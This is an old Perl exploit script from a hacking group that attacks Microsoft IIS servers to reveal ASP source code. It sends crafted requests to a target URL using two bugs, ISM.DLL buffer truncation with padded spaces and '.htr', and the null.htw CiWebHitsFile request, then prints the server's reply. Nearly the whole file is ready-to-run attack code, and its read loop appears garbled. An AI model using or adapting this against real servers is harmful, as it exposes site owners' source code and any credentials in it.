#----------------------------------------------------------------# # [ISMyASP] # # IIS ASP source code viewer using ISM.DLL buffer truncation bug # # and null.htw bug # # LoWNOISE Colombia 5/2000 # # Efrain 'ET' Torres et@cyberspace.org # #----------------------------------------------------------------# # Shoutz 2 f4lc0n & M43ztr0 <-- a gnu memb. # #----------------------------------------------------------------# # Some f() from wwwboard.pl by S.Sparling # #----------------------------------------------------------------# use Socket; $port=80; if (!($ARGV[0])) { print "\n[ISMyASP]\n"; print "$0 http://host/view.asp \n"; print "ET LoWNOISE Colombia.\n"; exit; } $url=$ARGV[0]; chop($url) if $url =~ /\n$/; print "url: $url\n"; $remote = $url; $remote =~ s/http\:\/\///g; $remote =~ s/\/([^>]|\n)*//g; print "host: $remote\n"; $path = $url; $path =~ s/http\:\/\///g; $path =~ s/$remote//g; print "path: $path\n"; $spaces=230; #THIS IS THE DEFAULT VALUE FOR ISM.DLL b.t #REMEMBER THIS ATTACK ONLY WORKS ONLY 1 TIME #READ THE CERBERUS CISADV000327. $submit = "GET $path"; $i=0; while($i < $spaces) { $submit= "$submit%20"; $i++; } $submit= "$submit.htr HTTP/1.0\n\n"; print "======Trying ism.dll buffer truncation...\n"; print "submit: $submit\n\n"; &post_message; print "======Trying null.htw...\n"; $submit="GET /null.htw?CiWebHitsFile=$path%20&CiRestriction=none&CiHiliteType=Full HTTP/1.0\n\n"; print "submit: $submit\n\n"; &post_message; sub post_message { if ($port =~ /\D/) { $port = getservbyname($port, 'tcp'); } die("No port specified.") unless $port; $iaddr = inet_aton($remote) || die("Failed to find host: $remote"); $paddr = sockaddr_in($port, $iaddr); $proto = getprotobyname('tcp'); socket(SOCK, PF_INET, SOCK_STREAM, $proto) || die("Failed to open socket: $!"); connect(SOCK, $paddr) || die("Unable to connect: $!"); send(SOCK,$submit,0); printf "\n======Waiting for reply [pray]....\n\n"; while() { print $_; } close(SOCK); } print "\n\n======THE END. [LoWNOISE]\n"; exit; #:) narco.guerrilla&gov.sucks.co (huge :x to PO-K)